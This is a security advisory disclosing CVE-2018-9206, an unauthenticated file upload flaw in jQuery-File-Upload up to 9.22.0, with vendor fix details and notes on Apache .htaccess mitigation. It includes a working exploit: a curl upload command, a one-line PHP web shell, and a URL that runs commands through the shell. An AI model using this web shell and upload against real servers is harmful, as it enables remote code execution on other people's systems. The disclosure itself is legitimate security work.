Advisory #: 204
Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
CVE-ID:[CVE-2018-9206]
Download Site: https://github.com/blueimp/jQuery-File-Upload/
Vendor: https://github.com/blueimp
Vendor Notified: 2018-10-09
Vendor Contact: blueimp.net, fixed v9.22.1
Advisory: http://www.vapidlabs.com/advisory.php?v=204
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
Vulnerability:
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution.
Export: JSON TEXT XML
Exploit Code:
  1. $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
  2.  
  3. Where shell.php is:
  4.  
  5. <?php $cmd=$_GET['cmd']; system($cmd);?>
  6.  
  7. Or
  8.  
  9. https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206
Screen Shots: [CVE-2018-9206.png][CVE-2018-9206-result.png]
Notes:
Actively being exploited in the wild.
https://github.com/blueimp/jQuery-File-Upload/pull/3514

The author includes a .htaccess under server/php/files that attempt to force the file as a download
and change the file extension to .html.

.htaccess with comments removed:

SetHandler default-handler
ForceType application/octet-stream
Header set Content-Disposition attachment


	ForceType none
	Header unset Content-Disposition


Header set X-Content-Type-Options nosniff

Testing this on default versions of Ubuntu and Debian:

If I enable AllowOverride All in /etc/apache2/apache2.conf for the directory /var/www I get an Internal Server Error.

The error log states:

Invalid command 'Header', perhaps misspelled or defined by a module not included in the server configuration.

So it seems the default apache configuration is missing mod_headers.

https://httpd.apache.org/docs/current/mod/mod_headers.html

root@debian:/etc/apache2/mods-enabled# ln -s ../mods-available/headers.load 
root@debian:/etc/apache2/mods-enabled# /etc/init.d/apache2 restart
[ ok ] Restarting apache2 (via systemctl): apache2.service.

http://example.com/jQuery-File-Upload-9.22.0/server/php/files/shell.php?cmd=uptime

Now the above downloads shell.html as the software author intended.